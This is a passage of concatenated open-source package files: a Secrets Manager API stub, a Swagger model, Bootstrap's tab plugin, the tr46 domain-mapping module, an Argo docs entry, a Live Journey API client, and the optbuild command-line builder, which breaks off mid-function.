add_replica_regions: AddReplicaRegionListType = None,
force_overwrite_replica_secret: BooleanType = None,
) -> CreateSecretResponse:
raise NotImplementedError
@handler("DeleteResourcePolicy")
def delete_resource_policy(
self, context: RequestContext, secret_id: SecretIdType
) -> DeleteResourcePolicyResponse:
raise NotImplementedError
@handler("DeleteSecret")
def delete_secret(
self,
context: RequestContext,
secret_id: SecretIdType,
recovery_window_in_days: RecoveryWindowInDaysType = None,
force_delete_without_recovery: BooleanType = None,
) -> DeleteSecretResponse:
raise NotImplementedError
@handler("DescribeSecret")
def describe_secret(
self, context: RequestContext, secret_id: SecretIdType
) -> DescribeSecretResponse:
raise NotImplementedError
@handler("GetRandomPassword")
def get_random_password(
self,
context: RequestContext,
password_length: PasswordLengthType = None,
exclude_characters: ExcludeCharactersType = None,
exclude_numbers: ExcludeNumbersType = None,
exclude_punctuation: ExcludePunctuationType = None,
exclude_uppercase: ExcludeUppercaseType = None,
exclude_lowercase: ExcludeLowercaseType = None,
include_space: IncludeSpaceType = None,
require_each_included_type: RequireEachIncludedTypeType = None,
) -> GetRandomPasswordResponse:
raise NotImplementedError
@handler("GetResourcePolicy")
def get_resource_policy(
self, context: RequestContext, secret_id: SecretIdType
) -> GetResourcePolicyResponse:
raise NotImplementedError
@handler("GetSecretValue")
def get_secret_value(
self,
context: RequestContext,
secret_id: SecretIdType,
version_id: SecretVersionIdType = None,
version_stage: SecretVersionStageType = None,
) -> GetSecretValueResponse:
raise NotImplementedError
@handler("ListSecretVersionIds")
def list_secret_version_ids(
self,
context: RequestContext,
secret_id: SecretIdType,
max_results: MaxResultsType = None,
next_token: NextTokenType = None,
include_deprecated: BooleanType = None,
) -> ListSecretVersionIdsResponse:
raise NotImplementedError
@handler("ListSecrets")
def list_secrets(
self,
context: RequestContext,
include_planned_deletion: BooleanType = None,
max_results: MaxResultsType = None,
next_token: NextTokenType = None,
filters: FiltersListType = None,
sort_order: SortOrderType = None,
) -> ListSecretsResponse:
raise NotImplementedError
@handler("PutResourcePolicy")
def put_resource_policy(
self,
context: RequestContext,
secret_id: SecretIdType,
resource_policy: NonEmptyResourcePolicyType,
block_public_policy: BooleanType = None,
) -> PutResourcePolicyResponse:
raise NotImplementedError
@handler("PutSecretValue")
def put_secret_value(
self,
context: RequestContext,
secret_id: SecretIdType,
client_request_token: ClientRequestTokenType = None,
secret_binary: SecretBinaryType = None,
secret_string: SecretStringType = None,
version_stages: SecretVersionStagesType = None,
) -> PutSecretValueResponse:
raise NotImplementedError
@handler("RemoveRegionsFromReplication")
def remove_regions_from_replication(
self,
context: RequestContext,
secret_id: SecretIdType,
remove_replica_regions: RemoveReplicaRegionListType,
) -> RemoveRegionsFromReplicationResponse:
raise NotImplementedError
@handler("ReplicateSecretToRegions")
def replicate_secret_to_regions(
self,
context: RequestContext,
secret_id: SecretIdType,
add_replica_regions: AddReplicaRegionListType,
force_overwrite_replica_secret: BooleanType = None,
) -> ReplicateSecretToRegionsResponse:
raise NotImplementedError
@handler("RestoreSecret")
def restore_secret(
self, context: RequestContext, secret_id: SecretIdType
) -> RestoreSecretResponse:
raise NotImplementedError
@handler("RotateSecret")
def rotate_secret(
self,
context: RequestContext,
secret_id: SecretIdType,
client_request_token: ClientRequestTokenType = None,
rotation_lambda_arn: RotationLambdaARNType = None,
rotation_rules: RotationRulesType = None,
rotate_immediately: BooleanType = None,
) -> RotateSecretResponse:
raise NotImplementedError
@handler("StopReplicationToReplica")
def stop_replication_to_replica(
self, context: RequestContext, secret_id: SecretIdType
) -> StopReplicationToReplicaResponse:
raise NotImplementedError
@handler("TagResource")
def tag_resource(
self, context: RequestContext, secret_id: SecretIdType, tags: TagListType
) -> None:
raise NotImplementedError
@handler("UntagResource")
def untag_resource(
self, context: RequestContext, secret_id: SecretIdType, tag_keys: TagKeyListType
) -> None:
raise NotImplementedError
@handler("UpdateSecret")
def update_secret(
self,
context: RequestContext,
secret_id: SecretIdType,
client_request_token: ClientRequestTokenType = None,
description: DescriptionType = None,
kms_key_id: KmsKeyIdType = None,
secret_binary: SecretBinaryType = None,
secret_string: SecretStringType = None,
) -> UpdateSecretResponse:
raise NotImplementedError
@handler("UpdateSecretVersionStage")
def update_secret_version_stage(
self,
context: RequestContext,
secret_id: SecretIdType,
version_stage: SecretVersionStageType,
remove_from_version_id: SecretVersionIdType = None,
move_to_version_id: SecretVersionIdType = None,
) -> UpdateSecretVersionStageResponse:
raise NotImplementedError
@handler("ValidateResourcePolicy")
def validate_resource_policy(
self,
context: RequestContext,
resource_policy: NonEmptyResourcePolicyType,
secret_id: SecretIdType = None,
) -> ValidateResourcePolicyResponse:
raise NotImplementedError | PypiClean |
/mindfoundry.client.analyze-1.20.4.tar.gz/mindfoundry.client.analyze-1.20.4/src/mindfoundry/client/analyze/swagger/models/future.py | from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.future_output_of_your_request import FutureOutputOfYourRequest
from ..models.status import Status
from ..types import UNSET, Unset
T = TypeVar("T", bound="Future")
@attr.s(auto_attribs=True)
class Future:
"""
Attributes:
future_id (Union[Unset, str]):
status (Union[Unset, Status]):
response (Union[Unset, None, FutureOutputOfYourRequest]):
"""
future_id: Union[Unset, str] = UNSET
status: Union[Unset, Status] = UNSET
response: Union[Unset, None, FutureOutputOfYourRequest] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
future_id = self.future_id
status: Union[Unset, str] = UNSET
if not isinstance(self.status, Unset):
status = self.status.value
response: Union[Unset, None, Dict[str, Any]] = UNSET
if not isinstance(self.response, Unset):
response = self.response.to_dict() if self.response else None
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update({
})
if future_id is not UNSET:
field_dict["futureId"] = future_id
if status is not UNSET:
field_dict["status"] = status
if response is not UNSET:
field_dict["response"] = response
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
future_id = d.pop("futureId", UNSET)
_status = d.pop("status", UNSET)
status: Union[Unset, Status]
if isinstance(_status, Unset):
status = UNSET
else:
status = Status(_status)
_response = d.pop("response", UNSET)
response: Union[Unset, None, FutureOutputOfYourRequest]
if _response is None:
response = None
elif isinstance(_response, Unset):
response = UNSET
else:
response = FutureOutputOfYourRequest.from_dict(_response)
future = cls(
future_id=future_id,
status=status,
response=response,
)
future.additional_properties = d
return future
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties | PypiClean |
/odooku_odoo_base-11.0.7-py35-none-any.whl/odoo/addons/web/static/lib/bootstrap/js/tab.js | +function ($) {
'use strict';
// TAB CLASS DEFINITION
// ====================
var Tab = function (element) {
this.element = $(element)
}
Tab.VERSION = '3.3.4'
Tab.TRANSITION_DURATION = 150
Tab.prototype.show = function () {
var $this = this.element
var $ul = $this.closest('ul:not(.dropdown-menu)')
var selector = $this.data('target')
if (!selector) {
selector = $this.attr('href')
selector = selector && selector.replace(/.*(?=#[^\s]*$)/, '') // strip for ie7
}
if ($this.parent('li').hasClass('active')) return
var $previous = $ul.find('.active:last a')
var hideEvent = $.Event('hide.bs.tab', {
relatedTarget: $this[0]
})
var showEvent = $.Event('show.bs.tab', {
relatedTarget: $previous[0]
})
$previous.trigger(hideEvent)
$this.trigger(showEvent)
if (showEvent.isDefaultPrevented() || hideEvent.isDefaultPrevented()) return
var $target = $(selector)
this.activate($this.closest('li'), $ul)
this.activate($target, $target.parent(), function () {
$previous.trigger({
type: 'hidden.bs.tab',
relatedTarget: $this[0]
})
$this.trigger({
type: 'shown.bs.tab',
relatedTarget: $previous[0]
})
})
}
Tab.prototype.activate = function (element, container, callback) {
var $active = container.find('> .active')
var transition = callback
&& $.support.transition
&& (($active.length && $active.hasClass('fade')) || !!container.find('> .fade').length)
function next() {
$active
.removeClass('active')
.find('> .dropdown-menu > .active')
.removeClass('active')
.end()
.find('[data-toggle="tab"]')
.attr('aria-expanded', false)
element
.addClass('active')
.find('[data-toggle="tab"]')
.attr('aria-expanded', true)
if (transition) {
element[0].offsetWidth // reflow for transition
element.addClass('in')
} else {
element.removeClass('fade')
}
if (element.parent('.dropdown-menu').length) {
element
.closest('li.dropdown')
.addClass('active')
.end()
.find('[data-toggle="tab"]')
.attr('aria-expanded', true)
}
callback && callback()
}
$active.length && transition ?
$active
.one('bsTransitionEnd', next)
.emulateTransitionEnd(Tab.TRANSITION_DURATION) :
next()
$active.removeClass('in')
}
// TAB PLUGIN DEFINITION
// =====================
function Plugin(option) {
return this.each(function () {
var $this = $(this)
var data = $this.data('bs.tab')
if (!data) $this.data('bs.tab', (data = new Tab(this)))
if (typeof option == 'string') data[option]()
})
}
var old = $.fn.tab
$.fn.tab = Plugin
$.fn.tab.Constructor = Tab
// TAB NO CONFLICT
// ===============
$.fn.tab.noConflict = function () {
$.fn.tab = old
return this
}
// TAB DATA-API
// ============
var clickHandler = function (e) {
e.preventDefault()
Plugin.call($(this), 'show')
}
$(document)
.on('click.bs.tab.data-api', '[data-toggle="tab"]', clickHandler)
.on('click.bs.tab.data-api', '[data-toggle="pill"]', clickHandler)
}(jQuery); | PypiClean |
/py_tgcalls_kaizoku-0.9.5-cp39-cp39-win_amd64.whl/pytgcalls/node_modules/tr46/index.js | "use strict";
var punycode = require("punycode");
var mappingTable = require("./lib/mappingTable.json");
var PROCESSING_OPTIONS = {
TRANSITIONAL: 0,
NONTRANSITIONAL: 1
};
function normalize(str) { // fix bug in v8
return str.split('\u0000').map(function (s) { return s.normalize('NFC'); }).join('\u0000');
}
function findStatus(val) {
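  // Binary search the UTS #46 mapping table for the range covering this code point.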
var start = 0;
var end = mappingTable.length - 1;
while (start <= end) {
var mid = Math.floor((start + end) / 2);
var target = mappingTable[mid];
if (target[0][0] <= val && target[0][1] >= val) {
return target;
} else if (target[0][0] > val) {
end = mid - 1;
} else {
start = mid + 1;
}
}
return null;
}
var regexAstralSymbols = /[\uD800-\uDBFF][\uDC00-\uDFFF]/g;
function countSymbols(string) {
return string
// replace every surrogate pair with a BMP symbol
.replace(regexAstralSymbols, '_')
// then get the length
.length;
}
function mapChars(domain_name, useSTD3, processing_option) {
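  // Walk the domain one code point at a time and apply the UTS #46 mapping
  // table: drop "ignored" code points, substitute "mapped" ones, and record an
  // error for "disallowed" ones (subject to the useSTD3 and transitional flags).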
var hasError = false;
var processed = "";
var len = countSymbols(domain_name);
for (var i = 0; i < len; ++i) {
var codePoint = domain_name.codePointAt(i);
var status = findStatus(codePoint);
switch (status[1]) {
case "disallowed":
hasError = true;
processed += String.fromCodePoint(codePoint);
break;
case "ignored":
break;
case "mapped":
processed += String.fromCodePoint.apply(String, status[2]);
break;
case "deviation":
if (processing_option === PROCESSING_OPTIONS.TRANSITIONAL) {
processed += String.fromCodePoint.apply(String, status[2]);
} else {
processed += String.fromCodePoint(codePoint);
}
break;
case "valid":
processed += String.fromCodePoint(codePoint);
break;
case "disallowed_STD3_mapped":
if (useSTD3) {
hasError = true;
processed += String.fromCodePoint(codePoint);
} else {
processed += String.fromCodePoint.apply(String, status[2]);
}
break;
case "disallowed_STD3_valid":
if (useSTD3) {
hasError = true;
}
processed += String.fromCodePoint(codePoint);
break;
}
}
return {
string: processed,
error: hasError
};
}
var combiningMarksRegex = /[\u0300-\u036F\u0483-\u0489\u0591-\u05BD\u05BF\u05C1\u05C2\u05C4\u05C5\u05C7\u0610-\u061A\u064B-\u065F\u0670\u06D6-\u06DC\u06DF-\u06E4\u06E7\u06E8\u06EA-\u06ED\u0711\u0730-\u074A\u07A6-\u07B0\u07EB-\u07F3\u0816-\u0819\u081B-\u0823\u0825-\u0827\u0829-\u082D\u0859-\u085B\u08E4-\u0903\u093A-\u093C\u093E-\u094F\u0951-\u0957\u0962\u0963\u0981-\u0983\u09BC\u09BE-\u09C4\u09C7\u09C8\u09CB-\u09CD\u09D7\u09E2\u09E3\u0A01-\u0A03\u0A3C\u0A3E-\u0A42\u0A47\u0A48\u0A4B-\u0A4D\u0A51\u0A70\u0A71\u0A75\u0A81-\u0A83\u0ABC\u0ABE-\u0AC5\u0AC7-\u0AC9\u0ACB-\u0ACD\u0AE2\u0AE3\u0B01-\u0B03\u0B3C\u0B3E-\u0B44\u0B47\u0B48\u0B4B-\u0B4D\u0B56\u0B57\u0B62\u0B63\u0B82\u0BBE-\u0BC2\u0BC6-\u0BC8\u0BCA-\u0BCD\u0BD7\u0C00-\u0C03\u0C3E-\u0C44\u0C46-\u0C48\u0C4A-\u0C4D\u0C55\u0C56\u0C62\u0C63\u0C81-\u0C83\u0CBC\u0CBE-\u0CC4\u0CC6-\u0CC8\u0CCA-\u0CCD\u0CD5\u0CD6\u0CE2\u0CE3\u0D01-\u0D03\u0D3E-\u0D44\u0D46-\u0D48\u0D4A-\u0D4D\u0D57\u0D62\u0D63\u0D82\u0D83\u0DCA\u0DCF-\u0DD4\u0DD6\u0DD8-\u0DDF\u0DF2\u0DF3\u0E31\u0E34-\u0E3A\u0E47-\u0E4E\u0EB1\u0EB4-\u0EB9\u0EBB\u0EBC\u0EC8-\u0ECD\u0F18\u0F19\u0F35\u0F37\u0F39\u0F3E\u0F3F\u0F71-\u0F84\u0F86\u0F87\u0F8D-\u0F97\u0F99-\u0FBC\u0FC6\u102B-\u103E\u1056-\u1059\u105E-\u1060\u1062-\u1064\u1067-\u106D\u1071-\u1074\u1082-\u108D\u108F\u109A-\u109D\u135D-\u135F\u1712-\u1714\u1732-\u1734\u1752\u1753\u1772\u1773\u17B4-\u17D3\u17DD\u180B-\u180D\u18A9\u1920-\u192B\u1930-\u193B\u19B0-\u19C0\u19C8\u19C9\u1A17-\u1A1B\u1A55-\u1A5E\u1A60-\u1A7C\u1A7F\u1AB0-\u1ABE\u1B00-\u1B04\u1B34-\u1B44\u1B6B-\u1B73\u1B80-\u1B82\u1BA1-\u1BAD\u1BE6-\u1BF3\u1C24-\u1C37\u1CD0-\u1CD2\u1CD4-\u1CE8\u1CED\u1CF2-\u1CF4\u1CF8\u1CF9\u1DC0-\u1DF5\u1DFC-\u1DFF\u20D0-\u20F0\u2CEF-\u2CF1\u2D7F\u2DE0-\u2DFF\u302A-\u302F\u3099\u309A\uA66F-\uA672\uA674-\uA67D\uA69F\uA6F0\uA6F1\uA802\uA806\uA80B\uA823-\uA827\uA880\uA881\uA8B4-\uA8C4\uA8E0-\uA8F1\uA926-\uA92D\uA947-\uA953\uA980-\uA983\uA9B3-\uA9C0\uA9E5\uAA29-\uAA36\uAA43\uAA4C\uAA4D\uAA7B-\uAA7D\uAAB0\uAAB2-\uAAB4\uAAB7\uAAB8\uAABE\uAABF\uAAC1\uAAEB-\uAAEF\uAAF5\uAAF6\uABE3-\uABEA\uABEC\uABED\uFB1E\uFE00-\uFE0F\uFE20-\uFE2D]|\uD800[\uDDFD\uDEE0\uDF76-\uDF7A]|\uD802[\uDE01-\uDE03\uDE05\uDE06\uDE0C-\uDE0F\uDE38-\uDE3A\uDE3F\uDEE5\uDEE6]|\uD804[\uDC00-\uDC02\uDC38-\uDC46\uDC7F-\uDC82\uDCB0-\uDCBA\uDD00-\uDD02\uDD27-\uDD34\uDD73\uDD80-\uDD82\uDDB3-\uDDC0\uDE2C-\uDE37\uDEDF-\uDEEA\uDF01-\uDF03\uDF3C\uDF3E-\uDF44\uDF47\uDF48\uDF4B-\uDF4D\uDF57\uDF62\uDF63\uDF66-\uDF6C\uDF70-\uDF74]|\uD805[\uDCB0-\uDCC3\uDDAF-\uDDB5\uDDB8-\uDDC0\uDE30-\uDE40\uDEAB-\uDEB7]|\uD81A[\uDEF0-\uDEF4\uDF30-\uDF36]|\uD81B[\uDF51-\uDF7E\uDF8F-\uDF92]|\uD82F[\uDC9D\uDC9E]|\uD834[\uDD65-\uDD69\uDD6D-\uDD72\uDD7B-\uDD82\uDD85-\uDD8B\uDDAA-\uDDAD\uDE42-\uDE44]|\uD83A[\uDCD0-\uDCD6]|\uDB40[\uDD00-\uDDEF]/;
function validateLabel(label, processing_option) {
if (label.substr(0, 4) === "xn--") {
label = punycode.toUnicode(label);
processing_option = PROCESSING_OPTIONS.NONTRANSITIONAL;
}
var error = false;
if (normalize(label) !== label ||
(label[3] === "-" && label[4] === "-") ||
label[0] === "-" || label[label.length - 1] === "-" ||
label.indexOf(".") !== -1 ||
label.search(combiningMarksRegex) === 0) {
error = true;
}
var len = countSymbols(label);
for (var i = 0; i < len; ++i) {
var status = findStatus(label.codePointAt(i));
    if ((processing_option === PROCESSING_OPTIONS.TRANSITIONAL && status[1] !== "valid") ||
        (processing_option === PROCESSING_OPTIONS.NONTRANSITIONAL &&
status[1] !== "valid" && status[1] !== "deviation")) {
error = true;
break;
}
}
return {
label: label,
error: error
};
}
function processing(domain_name, useSTD3, processing_option) {
var result = mapChars(domain_name, useSTD3, processing_option);
result.string = normalize(result.string);
var labels = result.string.split(".");
for (var i = 0; i < labels.length; ++i) {
try {
      var validation = validateLabel(labels[i], processing_option);
labels[i] = validation.label;
result.error = result.error || validation.error;
} catch(e) {
result.error = true;
}
}
return {
string: labels.join("."),
error: result.error
};
}
module.exports.toASCII = function(domain_name, useSTD3, processing_option, verifyDnsLength) {
var result = processing(domain_name, useSTD3, processing_option);
var labels = result.string.split(".");
labels = labels.map(function(l) {
try {
return punycode.toASCII(l);
} catch(e) {
result.error = true;
return l;
}
});
if (verifyDnsLength) {
var total = labels.slice(0, labels.length - 1).join(".").length;
    if (total > 253 || total === 0) {
result.error = true;
}
for (var i=0; i < labels.length; ++i) {
      if (labels[i].length > 63 || labels[i].length === 0) {
result.error = true;
break;
}
}
}
if (result.error) return null;
return labels.join(".");
};
module.exports.toUnicode = function(domain_name, useSTD3) {
var result = processing(domain_name, useSTD3, PROCESSING_OPTIONS.NONTRANSITIONAL);
return {
domain: result.string,
error: result.error
};
};
module.exports.PROCESSING_OPTIONS = PROCESSING_OPTIONS; | PypiClean |
/bmlx-argo-workflows-1.0.5.tar.gz/bmlx-argo-workflows-1.0.5/docs/V1SecretEnvSource.md | # V1SecretEnvSource
SecretEnvSource selects a Secret to populate the environment variables with. The contents of the target Secret's Data field will represent the key-value pairs as environment variables.
## Properties
Name | Type | Description | Notes
------------ | ------------- | ------------- | -------------
**name** | **str** | Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names | [optional]
**optional** | **bool** | Specify whether the Secret must be defined | [optional]
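A minimal construction sketch is shown below. The import path is an assumption
(generated clients expose models under different module names), so adjust it to
match your installation; the keyword arguments mirror the properties above.

```python
# Hypothetical usage sketch -- the module path below is an assumption.
from argo.workflows.client.models import V1SecretEnvSource

# Populate environment variables from the "db-credentials" Secret;
# optional=False means a missing Secret is an error.
env_from = V1SecretEnvSource(name="db-credentials", optional=False)
```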
[[Back to Model list]](../README.md#documentation-for-models) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to README]](../README.md)
| PypiClean |
/lj_api_client-0.1.1-py3-none-any.whl/lj_api_client/client.py | from typing import List
import requests as rq
from pydantic import validate_arguments
from lj_api_client import utils, resources, schemas, exceptions
class Client:
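    """Thin wrapper around the Live Journey public API.

    Usage sketch (the API key is a placeholder)::

        client = Client(api_key="YOUR_API_KEY")
        workspaces = client.get_workspaces()
    """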
DEFAULT_HOST = "https://public-api.livejourney.io"
def __init__(self, api_key, host=None, api_version='v1'):
if not host:
host = self.DEFAULT_HOST
self._base_url = utils.urljoin(host, 'api', api_version)
self._session = rq.Session()
self._session.headers.update({
'x-api-key': api_key,
'content-type': 'application/json'
})
self._resources = {
'users': resources.UsersPool(
utils.urljoin(self._base_url, 'users'), self._session
),
'workspaces': resources.WorkspacesPool(
utils.urljoin(self._base_url, 'workspaces'), self._session
),
}
@property
def resources(self):
return self._resources
@property
def users(self):
return self.resources.get('users')
@property
def workspaces(self):
return self.resources.get('workspaces')
def get_user(self) -> rq.Response:
return self.users.fetch_list()
    def get_workspaces(self) -> rq.Response:
return self.workspaces.fetch_list()
def get_workspace(self, workspace_id: str) -> rq.Response:
return self.workspaces.fetch_item(workspace_id)
def get_cards(self, workspace_id: str) -> rq.Response:
return self.workspaces.cards(workspace_id).fetch_list()
def get_card(self, workspace_id: str, card_id: str) -> rq.Response:
return self.workspaces.cards(workspace_id).fetch_item(card_id)
@validate_arguments
    def create_card(self, workspace_id: str, card_data: schemas.CardCreationModel) -> rq.Response:
return self.workspaces.cards(workspace_id).create_item(card_data.dict(exclude_none=True))
@validate_arguments
    def update_card(self, workspace_id: str, card_id: str, card_data: schemas.CardUpdateModel) -> rq.Response:
return self.workspaces.cards(workspace_id).update_item(card_id, card_data.dict(exclude_none=True))
def delete_card(self, workspace_id: str, card_id: str) -> rq.Response:
return self.workspaces.cards(workspace_id).delete_item(card_id)
def upload_data_to_card(self, workspace_id: str, card_id: str, log_file_path: str, desc_file_path: str = None):
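        # Flow: check that the card is ready for a new import, request a presigned
        # upload URL for each provided file (event log, plus an optional descriptive
        # file), upload the files, then trigger the card feed to start the import.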
res = self.get_card(workspace_id, card_id)
if res.status_code != 200:
exceptions.raise_request_exception_from_res(res)
last_import_status = res.json()['data']['card']['last_import_status']
if last_import_status not in ['EMPTY', 'DONE', 'ERROR']:
raise exceptions.CardNotReadyError('Previous data import in progress, please retry later')
elif last_import_status == 'ERROR':
raise exceptions.CardError('An error occurred on your card please contact support or create new card')
files_data = [
file_data
for file_data in [(log_file_path, 'log'), (desc_file_path, 'descriptive')]
if file_data[0]
]
for file_path, _ in files_data:
utils.validate_file_path(file_path)
for file_path, data_type in files_data:
res = self.workspaces.cards(workspace_id).presigned_url(card_id).fetch_list(params={'data_type': data_type})
if res.status_code != 200:
exceptions.raise_request_exception_from_res(res)
presigned_url = res.json()['data']['presigned_url']
with open(file_path, 'rb') as f:
res = rq.post(presigned_url['url'], files={'file': f}, data=presigned_url['fields'])
if res.status_code != 204:
exceptions.raise_request_exception_from_res(res)
res = self.workspaces.cards(workspace_id).feed(card_id).create_item({})
if res.status_code != 201:
exceptions.raise_request_exception_from_res(res)
return res | PypiClean |
/optbuild-0.2.1.tar.gz/optbuild-0.2.1/lib/optbuild.py | from __future__ import division, absolute_import, print_function
from six import viewitems, string_types, with_metaclass
__version__ = "$Revision: 1.30 $"
from distutils.spawn import find_executable
from functools import partial
import optparse
import signal
from subprocess import Popen, PIPE
import sys
from autolog import autolog
_log = autolog()
_log_exec = _log[".exec"]
# XXX: we should eliminate dependencies on optparse, I don't think it
# gets us anything
def _write_log_exec(cmdline):
cmdline_strings = [arg for arg in cmdline if isinstance(arg, string_types)]
if " " in "".join(cmdline_strings):
# quote every arg
_log_exec.info(" ".join("'%s'" % arg.encode("unicode_escape")
for arg in cmdline_strings))
else:
_log_exec.info(" ".join(cmdline_strings))
# XXX: should probably be deprecated in favor of subprocess.CalledProcessError
class ReturncodeError(Exception):
## this doesn't have an errno, so it can't be an OSError
def __init__(self, cmdline, returncode, output=None, error=None):
self.cmdline = cmdline
self.returncode = returncode
self.output = output
self.error = error
def __str__(self):
return "%s returned %s" % (self.cmdline[0], self.returncode)
class SignalError(ReturncodeError):
def __str__(self):
try:
signal_text = _signals[-self.returncode]
except KeyError:
signal_text = "signal %d" % -self.returncode
return "%s terminated by %s" % (self.cmdline[0], signal_text)
def _returncode_error_factory(cmdline, returncode, output=None, error=None):
if returncode >= 0:
error_cls = ReturncodeError
else:
error_cls = SignalError
raise error_cls(cmdline, returncode, output, error)
class Stdin(object):
"""
indicate that an "argument" is actually input
"""
def __init__(self, data):
self.data = data
class Cwd(str):
"""
indicate that an "argument" is a directory to change to
"""
pass
class OptionBuilder(optparse.OptionParser):
"""
GNU long-args style option builder
"""
def __init__(self, prog=None, *args, **kwargs):
optparse.OptionParser.__init__(self, prog=prog, *args, **kwargs)
self.dry_run = False
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
def __str__(self):
return self.prog
def __repr__(self):
return "%s('%s')" % (self.__class__, str(self).encode("string_escape"))
@staticmethod
def convert_option_name(option):
return option.replace("_", "-")
def _build_option(self, option, value):
"""always returns a list"""
option = self.convert_option_name(option)
if not isinstance(value, list):
value = [value]
res = []
for value_item in value:
res.extend(self.build_option(option, value_item))
return res
def _build_options(self, options):
# XXX: use the option_list to check/convert the options
# can't use a listcomp because _build_option always returns a
# list and the empty ones have to be eaten somehow
res = []
for key in sorted(options.keys()):
res.extend(self._build_option(key, options[key]))
return res
@staticmethod
def build_option(option, value):
if value is True:
return ["--%s" % option]
elif value is False or value is None:
return []
else:
return ["--%s=%s" % (option, value)]
def build_args(self, args=(), options={}):
return self._build_options(options) + list(args)
def get_prog(self, prog):
"""
virtual function to be overriden
"""
if prog is None:
prog = self.prog
return prog
def build_cmdline(self, args=(), options={}, prog=None):
res = [self.get_prog(prog)]
res.extend(self.build_args(args, options))
_write_log_exec(res)
return res
def _popen(self, args, options, input=None,
stdin=None, stdout=None, stderr=None, cwd=None):
cmdline = self.build_cmdline(args, options)
if self.dry_run:
if cwd or input:
# XXX: print "cd %s" or use a here document
raise NotImplementedError
print(" ".join(cmdline))
return
try:
pipe = Popen(cmdline, stdin=stdin, stdout=stdout, stderr=stderr,
cwd=cwd)
output, error = pipe.communicate(input)
returncode = pipe.wait()
except OSError as os_exception:
print("Failed to run command {}: {}".format(" ".join(cmdline),
os_exception),
file=sys.stderr)
# Re raise the exception and exit
raise
if returncode:
_returncode_error_factory(cmdline, returncode, output, error)
res = []
if stdout == PIPE:
res.append(output)
if stderr == PIPE:
res.append(error)
# if there's only one of (output, error), then only return it
if len(res) == 1:
return res[0]
else:
# otherwise return a tuple of both
return tuple(res)
def _getoutput(self, args, options, stdout=None, stderr=None):
input = None
stdin = None
cwd = None
arg_list = []
for arg in args:
if isinstance(arg, Stdin):
if isinstance(arg.data, string_types):
input = arg.data
stdin = PIPE
                elif isinstance(arg.data, io.IOBase):  # file-like object; the Python 2 ``file`` builtin no longer exists
stdin = arg.data
else:
raise ValueError("Stdin arg does not contain basestring"
" or file")
elif isinstance(arg, Cwd):
cwd = arg
else:
arg_list.append(arg)
return self._popen(tuple(arg_list), options, input,
stdin, stdout, stderr, cwd)
def getoutput_error(self, *args, **kwargs):
"""
runs a program and gets the stdout and error
"""
return self._getoutput(args, kwargs, stdout=PIPE, stderr=PIPE)
def getoutput(self, *args, **kwargs):
"""
runs a program and gets the stdout
"""
return self._getoutput(args, kwargs, stdout=PIPE)
def run(self, *args, **kwargs):
"""
runs a program and ignores the stdout
"""
self._getoutput(args, kwargs)
return None
def popen(self, *args, **kwargs):
"""
spawns a program and doesn't wait for it to return
"""
cmdline = self.build_cmdline(args, kwargs)
return Popen(cmdline)
class OptionBuilder_LongOptWithSpace(OptionBuilder):
@staticmethod
def build_option(option, value):
if value is True:
return ["--%s" % option]
elif value is False or value is None:
return []
else:
return ["--%s" % option, str(value)]
class OptionBuilder_ShortOptWithSpace(OptionBuilder):
@staticmethod
def build_option(option, value):
if value is True:
return ["-%s" % option]
elif value is False or value is None:
return []
else:
return ["-%s" % option, str(value)]
class OptionBuilder_ShortOptWithEquals(OptionBuilder):
@staticmethod
def build_option(option, value):
if value is True:
return ["-%s" % option]
elif value is False or value is None:
return []
else:
return ["-%s=%s" % (option, str(value))]
class OptionBuilder_ShortOptWithSpace_TF(OptionBuilder_ShortOptWithSpace):
# XXX: this should be an AddableMixin instead
@staticmethod
def build_option(option, value):
parent_build_option = \
partial(OptionBuilder_ShortOptWithSpace.build_option, option)
if value is True:
return parent_build_option("T")
elif value is False:
return parent_build_option("F")
else:
return parent_build_option(value)
class OptionBuilder_NoHyphenWithEquals(OptionBuilder):
@staticmethod
def build_option(option, value):
if isinstance(value, bool):
value = int(value)
elif value is None:
return []
return ["%s=%s" % (option, value)]
class AddableMixinMetaclass(type):
def __add__(cls, other):
name = "(%s.%s + %s.%s)" % (cls.__module__, cls.__name__,
other.__module__, other.__name__)
return type(name, (cls, other), {})
__radd__ = __add__
def __repr__(cls):
if cls.__name__.startswith("("):
# eliminates the __module__ part
return "<class '%s'>" % cls.__name__
else:
return type.__repr__(cls)
def _id(obj):
# found on python-dev somewhere to get around negative id()
return (sys.maxsize * 2 + 1) & id(obj)
class AddableMixin(with_metaclass(AddableMixinMetaclass, object)):
def __repr__(self):
if self.__class__.__name__.startswith("("):
return "<%s object at 0x%x>" % (self.__class__.__name__, _id(self))
else:
            return super(AddableMixin, self).__repr__()
def __new__(cls, *args, **kwargs):
# beginning in Python 2.6, object.__new__ no longer takes
# args, and raises a deprecation warning, so we strip out any
# args and kwargs (technically OK) before continuing on
new = super(AddableMixin, cls).__new__
if new == object.__new__:
return new(cls)
else:
return new(cls, *args, **kwargs)
def __init__(self, *args, **kwargs):
# different depending on whether old- and new-style classes
# are being mixed, because object.__init__() does not call the
# next method. It does not cooperate with super() by lack of
# design. I think this is a bug, but I'm sure the Python core
        # developers wouldn't agree.
        # if this is mixing with a new-style class
if type(self).mro()[-1] is object:
supertype = AddableMixin
else:
# for old-style classes, object goes in the middle
supertype = object
init_unbound = super(supertype, type(self)).__init__
init_bound = super(supertype, self).__init__
# see comment for AddableMixin.__new__
if init_unbound == object.__init__:
return init_bound()
else:
return init_bound(*args, **kwargs)
class Mixin_ArgsFirst(AddableMixin):
def build_args(self, args=(), options={}):
return list(args) + self._build_options(options)
class Mixin_NoConvertUnderscore(AddableMixin):
@staticmethod
def convert_option_name(option):
return option
class Mixin_UseFullProgPath(AddableMixin):
def get_prog(self, prog):
prog = OptionBuilder.get_prog(self, prog)
res = find_executable(prog)
